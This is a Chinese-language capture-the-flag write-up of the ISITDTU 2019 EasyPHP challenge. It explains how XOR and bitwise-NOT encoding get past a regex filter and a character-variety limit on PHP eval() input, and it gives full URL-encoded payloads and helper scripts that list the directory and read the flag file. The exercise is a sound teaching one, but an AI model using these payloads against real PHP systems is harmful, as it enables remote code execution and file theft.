PHP异或绕过,无字符数字RCE
例题:[ISITDTU 2019]EasyPHP
代码:
<?php
highlight_file(__FILE__);
$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
die('rosé will not do it');
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
die('you are so close, omg');
eval($_);
?>
源码解析:
1、 count_chars()函数
返回字符串中所用字符的信息(例如,ASCII 字符在字符串中出现的次数,或者某个字符是否已经在字符串中使用过)
语法:
count_chars(string,mode)
参数 | 描述 |
---|---|
string | 必需。规定要检查的字符串。 |
mode | 可选。规定返回模式。默认是 0。以下是不同的返回模式: 0 - 数组,ASCII 值为键名,出现的次数为键值 1 - 数组,ASCII 值为键名,出现的次数为键值,只列出出现次数大于 0 的值 2 - 数组,ASCII 值为键名,出现的次数为键值,只列出出现次数等于 0 的值 3 - 字符串,带有所有使用过的不同的字符 4 - 字符串,带有所有未使用过的不同的字符 |
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
die('you are so close, omg');
3这里的意思就是,限制输入长度为13个字符种类
例子:
<?php
$str = "Hello Aiwin";
echo 111;
echo count_chars($str, 3);
echo strlen(count_chars($str, 3));
输出: AHeilnow9 //在A之前还有一个空格,也算进字符种类之一。
2、正则过滤
preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_)
https://regex101.com/
\x00- 匹配\x00到空格(\x20)
0-9 匹配0-9的数字
'"`$&.,|[{_defgops 匹配这些字符
\x7F 匹配DEL(\x7F)字符
+ 匹配之前的token在1次和无限次之间,尽可能多的次数,根据需要返回(贪婪)
\x00-' ' 匹配ascll码在0-32之间的字符
0-9 匹配范围数字0-9
\' 匹配 '
`" ' $ & .,|[{_defgops` 匹配列表 " ' $ & .,|[{_defgops 中的单个字符。
\x7F 匹配字符十进制127
Payload
首先试试phpinfo()
<?php
print(urlencode(~'phpinfo'));
输出:
%8F%97%8F%96%91%99%90
我们查看disable_functions
进行命令执行的函数基本都被过滤了,所以我们可以使用scandir(),var_dump(),readfile(),print_r()等函数查看目录,并获取flag,先获取看目录下的文件,通过print_r(scandir(.))输出当前目录下的内容,同样使用取反绕过。
print_r(scandir(‘.’));
查看当前目录下的所有文件名//无参数RCE
绕过字符种类限制
本地写脚本进行实验:
<?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3));
这里使用的print_r(scandir(‘.’));
= ((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF));
但是使用了16 >13种,所以这里的做法是,选取已有的13种,再生成另外的3种,从而绕过过滤。
验证的小脚本:
str = 'pscadi'
target = 'ntr'
for m in target:
for a in str:
for b in str:
for c in str:
if ord(a)^ord(b)^ord(c) == ord(m):
print("{} = {}^{}^{}".format(m,a,b,c))
输出(取了三个结果):
n = c^d^i
t = s^c^d
r = p^c^a
所以原来payload的’ntr’可以使用其他字母异或来生成。
即:n=c^d^i,那么n的取反就是n^0xff=c^d^i^0xff也是可以的.
即
n: %91^%FF=%9C^%9B^%96^%FF
t: %8B^%FF=%9C^%9B^%8C^%FF
r: %8D^%FF=%9E^%9C^%8F^%FF
故:其他字母进行三次的%FF异或,相当于前两次异或后仍然为原来的字符。
print_r:
(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)
变换成:
(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
scandir:
(%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)
变换成:
(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
现在生成的payload:
((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C))^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
本地测试小脚本:
<?php
$print_r=urldecode('%8F%9E%96%9C%9C%A0%9E')^urldecode('%FF%9C%FF%9B%9B%FF%9C')^urldecode('%FF%8F%FF%96%8C%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF');
$scandir=urldecode('%8C%9C%9E%9C%9B%96%9E')^urldecode('%FF%FF%FF%9B%FF%FF%9C')^urldecode('%FF%FF%FF%96%FF%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF');
print($print_r);
print("\n");
print($scandir);
输出为:
print_r
scandir
读出文件位置:
flag文件在最后,可以使用end直接将指针执行最后一个文件,然后读取,使用readfile(end(scandir(.));或者show_source()
还是使用之前的脚本进行生成:
<?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3));
print(urlencode(~'readfile'));
//readfile = %8D%9A%9E%9B%99%96%93%9A
//end = %9A%91%9B
//scandir = %8C%9C%9E%91%9B%96%8D
// . = %D1
现在的payload为:
?_=readfile(end(scandir(.));
?_=((readfile)^(%FF))(((end)^(%FF))(((scandir)^(%FF))(.^%FF)));
?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%91%9B)^(%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
现在为16种字符,替换为13个字符种类的payload:
str = 'readfile'
target = 'nsc'
for m in target:
for a in str:
for b in str:
for c in str:
if ord(a)^ord(b)^ord(c) == ord(m):
print("{} = {}^{}^{}".format(m,a,b,c))
输出(取三个结果):
n = a^f^i
s = r^e^d
c = a^d^f
替换之后的payload为:
((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
换之后的payload为:
((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));